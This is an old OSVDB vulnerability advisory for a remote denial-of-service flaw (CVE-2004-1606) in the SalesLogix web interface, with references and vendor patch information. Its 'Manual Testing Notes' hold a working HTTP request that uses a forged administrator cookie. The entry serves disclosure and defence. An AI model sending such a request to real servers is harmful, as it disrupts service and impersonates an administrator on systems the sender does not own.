SalesLogix Invalid HTTP Request DoS

2004-10-18T09:05:30
ID OSVDB:10943
Type osvdb
Reporter Carl Livitt (carl@agenda-security.co.uk)
Modified 2004-10-18T09:05:30

Description

Vulnerability Description

SalesLogix contains a flaw that may allow a remote denial of service. The issue is triggered when an invalid HTTP request is issued, and will result in loss of availability for the service.

Solution Description

There are currently no known workarounds or upgrades that correct this issue. However, SalesLogix has released a patch that addresses this vulnerability.

Manual Testing Notes

    GET /scripts/slxweb.dll/getfile HTTP/1.0
    Host: [victim]
    Cookie: slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|

References:

Vendor URL: http://www.saleslogix.com
Vendor Specific Solution URL: http://support.saleslogix.com
Security Tracker: 1011769
Secunia Advisory ID: 12883
Related OSVDB ID: 10946
Related OSVDB ID: 10949
Related OSVDB ID: 10945
Related OSVDB ID: 10942
Related OSVDB ID: 10947
Related OSVDB ID: 10948
Related OSVDB ID: 10944
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0661.html
Keyword: Agenda-Security-Saleslogix-1-2004
CVE-2004-1606